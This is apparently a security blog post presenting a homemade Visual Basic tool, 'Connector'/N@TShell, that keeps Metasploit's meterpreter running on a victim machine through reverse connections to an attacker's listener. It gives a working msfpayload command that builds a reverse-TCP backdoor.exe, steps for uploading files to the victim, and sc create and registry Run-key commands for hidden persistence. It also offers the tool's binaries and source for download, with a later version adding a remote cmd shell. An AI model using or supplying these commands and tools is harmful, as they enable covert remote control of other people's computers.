N@T Shell

A while back I needed a way to make metasploit’s meterpreter persistent or to be able to remotely execute it whenever needed.

I decided to try and create a tool for doing that using Visual Basic

Let me first say that i am not a programmer, I have very basic programming skills (some code snippets were taken from planet source code).

The concept is very simple, The program have 2 parts:

1. Server (Console) – The server will act as a listener, Only receives connection from the client with no other features.

2. Client (Connector) – Will try to connect to the server (a reverse connection) at a pre-configured interval, Once connection is established it will auto execute the meterpreter exe file (or any other file you’d like).

Let’s assume you have already created a meterpreter binary payload and you have already deployed it on your target victim machine.

If not,  here’s the syntax for creating a basic meterpreter binary payload:

exploit ~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 X > backdoor.exe

Usage is simple, First time you launch the client(Connector) it will run in “config” mode which means it will be visible.

First time you should run it on your PC and configure the settings as desired.

Reomte Host IP:  “Attacker/Listener ip address”
Remote Host Port:  “Attacker/Listener port”
Visibility:  “true or false”
Meterpreter Path:  “meterpreter path on client/victim pc”
Connection Interval:  “1000 – 60000″

Client Side

Client Side

After saving the changes an ini file will be created

In case you choose to run the client (Connector) in invisible mode the only way to make it visible again is by first killing its process via the task manager and then editing the ini file visible value.

You should upload the following files to the victim machine:

connector.exe & connector.ini – upload to any folder you like (both files should be in the same folder)

MSWINSCK.OCX – upload to windows/system32 folder if doesn’t already exist

In case you have administrative/system priviliges on victim machine you can run connector.exe as a system service using the following command (Win XP):

sc create connector binPath= "cmd /K start c:\windows\system32\connector.exe" start= auto error= ignore
net start connector 

If only user privileges you can run it in startup:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v connector /t REG_SZ /d "c:\windows\system32\connector.exe"

Once the client (Connector) is running on victim machine you can start the server on your side

Server Side

Server Side

After a connection is established from connector to console the exe file you’ve specified will be executed on the victim machine

Videos:

This video shows the use of the connector and console, The same machine will be used as the attacker and victim system for convenience purposes only.

Here we can see how windows calculator executes when a connection is established.

Connector Demo 1 from exploit on Vimeo.

Same as the first video but using meterpreter, again the same windows machine will be used as attacker/victim and with the exception of another session to a backtrack machine using ssh

this is just to show how the tool work and not a real world setup.

Connector Demo 2 from exploit on Vimeo.

Download:

Connector Compiled Binaries
You need to login to access to the attachmentsTitle: Connector Compiled Binaries (5 clicks)
Caption:
Filename: bin.zip
Size: 104 kB
Basic Version VB Source code
You need to login to access to the attachmentsTitle: Connector Source Code (46 clicks)
Caption: Source code
Filename: src.zip
Size: 38 kB

Later on I added some more features and expanded the program capabilities, I call this version “N@TSh3ll“:

added , multi sock to accept more connections, cmd shell, dyndns support

Here are some screen shots of the extended version:

Video:

N@TShell from exploit on Vimeo.

Download:

NaTShell 1.6
You need to login to access to the attachmentsTitle: NaTShell 1.6 (7 clicks)
Caption:
Filename: NaTShell-1.6.zip
Size: 1 MB

Post to Twitter

Leave a Reply

*

Recent Posts